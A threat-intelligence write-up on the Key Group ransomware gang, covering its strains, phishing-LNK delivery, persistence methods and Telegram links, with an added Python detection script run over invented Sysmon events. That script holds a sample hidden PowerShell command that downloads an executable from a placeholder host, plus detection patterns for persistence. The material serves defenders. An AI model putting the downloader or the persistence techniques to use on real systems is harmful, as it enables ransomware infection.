Key Group, a financially motivated cybercrime group, has been active since at least April 2022. It initially used the leaked Xorist ransomware builder and switched to the Chaos builder in August 2022. Its campaigns primarily targeted Russian users and used a range of techniques to evade detection and to persist on victim machines.
In 2023, the group experimented with different ransomware strains, including Annabelle, Slam, RuRansom (wiper), and UX-Cryptor, before settling on Hakuna Matata in February 2024. Most recently, they were observed using the Judge/NoCry ransomware in March 2024.
The group delivered Chaos and Xorist through a multi-stage chain: phishing emails carried LNK files which, when opened, ran PowerShell commands that downloaded self-extracting archives containing ransomware loaders; those loaders in turn fetched further archives containing the ransomware payloads.
The ransom notes were identical across variants. Earlier research had documented a similar attack that used a .NET WebClient to download Chaos from a GitHub repository, which also hosted other malware such as RuRansom, Hakuna Matata, J-Ransomware/LoveYou and NjRat.
The Xorist, Chaos, Annabelle and UX-Cryptor samples each use a different persistence technique to survive a reboot. Xorist modifies file extension associations so that it is launched whenever an encrypted file is opened.
Chaos spawns a new process that copies itself into the startup folder; Annabelle adds itself to the Run and Winlogon registry keys; UX-Cryptor modifies registry keys and drops multiple executables into the startup folder.
NoCry also adds itself to the startup folder, so it runs again at the next logon even after the original process has been removed unless the startup entry is deleted as well, which makes a partial clean-up insufficient.
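The delivery chain and the persistence mechanisms described above map onto a small set of endpoint telemetry patterns: a PowerShell downloader launched from an LNK (parent process explorer.exe), file creation in the per-user Startup folder, and registry writes to the Run key, the Winlogon Shell/Userinit values, and a file-type handler (shell\open\command). The following is an added example, not code from the article or from the researchers it cites; it runs simple detection rules over constructed Sysmon-style events (Event ID 1 process creation, 11 file creation, 13 registry value set) and correlates hits by the image that produced them, so one binary planting several persistence entries stands out. The Sysmon field names are real; every path, SID, hostname and the `.huis_bn` handler key are invented for illustration, and the "explorer.exe parent plus download cmdlet" heuristic for LNK-launched PowerShell is an assumption that will need tuning in a real environment.

```python
import re
from typing import Dict, List

# Constructed Sysmon-style events (not real telemetry). Field names follow
# Sysmon's; all values are invented for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    # Stage 1: LNK-launched PowerShell pulling the loader archive
    {"EventID": "1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c (New-Object Net.WebClient)"
                    ".DownloadFile('http://example.invalid/a.exe',"
                    "'C:\\Users\\u\\AppData\\Local\\Temp\\a.exe')"},
    # Chaos / UX-Cryptor / NoCry style: copy into the user's Startup folder
    {"EventID": "11", "Image": r"C:\Users\u\AppData\Local\Temp\a.exe",
     "TargetFilename": r"C:\Users\u\AppData\Roaming\Microsoft\Windows"
                       r"\Start Menu\Programs\Startup\svchost.exe"},
    # Annabelle style: Run key and Winlogon Shell value
    {"EventID": "13", "Image": r"C:\Users\u\AppData\Local\Temp\a.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\u\AppData\Local\Temp\a.exe"},
    {"EventID": "13", "Image": r"C:\Users\u\AppData\Local\Temp\a.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
     "Details": r"explorer.exe, C:\Users\u\AppData\Local\Temp\a.exe"},
    # Xorist style: handler for the encrypted-file extension (hypothetical ProgID)
    {"EventID": "13", "Image": r"C:\Users\u\AppData\Local\Temp\a.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Classes\.huis_bn\shell\open\command\(Default)",
     "Details": r"C:\Users\u\AppData\Local\Temp\a.exe %1"},
    # Benign noise: a vendor installer registering a handler from Program Files
    {"EventID": "13", "Image": r"C:\Program Files\Vendor\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Classes\vendorfile\shell\open\command\(Default)",
     "Details": r"C:\Program Files\Vendor\app.exe %1"},
    {"EventID": "1",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell Get-Date"},
]

# Registry/file patterns behind each persistence technique named in the text.
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)
WINLOGON = re.compile(r"\\Windows NT\\CurrentVersion\\Winlogon\\(Shell|Userinit)$", re.I)
FILE_ASSOC = re.compile(r"(?:\\Classes\\|^HKCR\\)[^\\]+\\shell\\open\\command\\", re.I)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.I)
DOWNLOAD_CUE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I)
# Registry values pointing into user-writable locations are the suspicious ones;
# handlers installed under Program Files by an installer are left alone.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\(AppData|Downloads|Desktop|Documents)\\|\\ProgramData\\|\\Temp\\", re.I)


def classify(ev: Dict[str, str]) -> List[str]:
    """Return the list of detection tags that apply to one Sysmon-style event."""
    tags: List[str] = []
    eid = ev.get("EventID")
    if eid == "1":  # process creation
        parent = ev.get("ParentImage", "").lower()
        image = ev.get("Image", "").lower()
        # Assumption: an LNK opened from the desktop/mail client runs its
        # command with explorer.exe as the parent process.
        if parent.endswith("\\explorer.exe") and "powershell" in image \
                and DOWNLOAD_CUE.search(ev.get("CommandLine", "")):
            tags.append("lnk_powershell_downloader")
    elif eid == "11":  # file creation
        if STARTUP_DIR.search(ev.get("TargetFilename", "")):
            tags.append("startup_folder_persistence")
    elif eid == "13":  # registry value set
        target = ev.get("TargetObject", "")
        details = ev.get("Details", "")
        if RUN_KEY.search(target) and USER_WRITABLE.search(details):
            tags.append("run_key_persistence")
        if WINLOGON.search(target) and USER_WRITABLE.search(details):
            tags.append("winlogon_persistence")
        if FILE_ASSOC.search(target) and USER_WRITABLE.search(details):
            tags.append("file_association_hijack")
    return tags


def scan(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Correlate hits by originating image: {image: sorted unique tags}."""
    by_image: Dict[str, set] = {}
    for ev in events:
        for tag in classify(ev):
            by_image.setdefault(ev.get("Image", "?"), set()).add(tag)
    return {img: sorted(tags) for img, tags in by_image.items()}


if __name__ == "__main__":
    for image, tags in scan(SAMPLE_EVENTS).items():
        print(f"{image}\n    {', '.join(tags)}")
```

The user-writable-path condition is what keeps the benign installer out of the results; in a real deployment it is the first thing to tune, together with an allow-list of signed installers, because legitimate software also registers file handlers and Run entries. The correlation step matters more than any single rule: a ransomware dropper that sets a Run value, a Winlogon Shell value and a file handler within seconds is a much stronger signal than any one of those writes on its own, and the image path it reports is also the artefact to remove along with every startup entry, since (as the text notes for NoCry) leaving the entry behind means the payload is simply re-launched at the next logon.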
Key Group likely grew out of a Russian-speaking spam group called “huis”: it built its ransomware from leaked builders and targeted Russian users.
Early versions used the “.huis_bn” extension and referenced “huis” in their ransom notes. Code analysis also revealed connections between the group and the “json1c” and “Bloody-Lord Destroyer-Crew” accounts on Telegram.
The group communicates through a closed Telegram channel and previously ran an open channel for updates and victim interaction. It appears to remain active: new malware samples were uploaded in February 2024.
According to Securelist, Key Group is a hacktivist group that relies on leaked ransomware builders and a GitHub repository as its primary C2 channel. That approach is common among hacktivist groups and makes their activity comparatively easy to track.
As leaked ransomware source code and builders become more widely available, the number of groups built on them keeps growing, and that proliferation is expected to continue.